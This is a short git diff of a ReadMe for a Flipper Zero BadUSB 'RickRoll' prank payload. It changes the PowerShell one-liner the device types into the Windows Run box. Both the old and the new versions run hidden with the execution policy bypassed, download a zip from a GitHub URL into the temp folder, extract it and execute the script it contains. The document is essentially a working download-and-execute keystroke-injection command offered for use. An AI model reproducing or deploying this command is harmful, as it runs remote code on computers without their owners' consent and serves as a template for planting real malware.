diff --git a/Payloads/Flip-ADV-RickRoll/ReadMe.md b/Payloads/Flip-ADV-RickRoll/ReadMe.md index 7b37286..38c2329 100644 --- a/Payloads/Flip-ADV-RickRoll/ReadMe.md +++ b/Payloads/Flip-ADV-RickRoll/ReadMe.md @@ -45,7 +45,7 @@ when a mouse movement is detected * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload ``` -powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1 +powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1" ```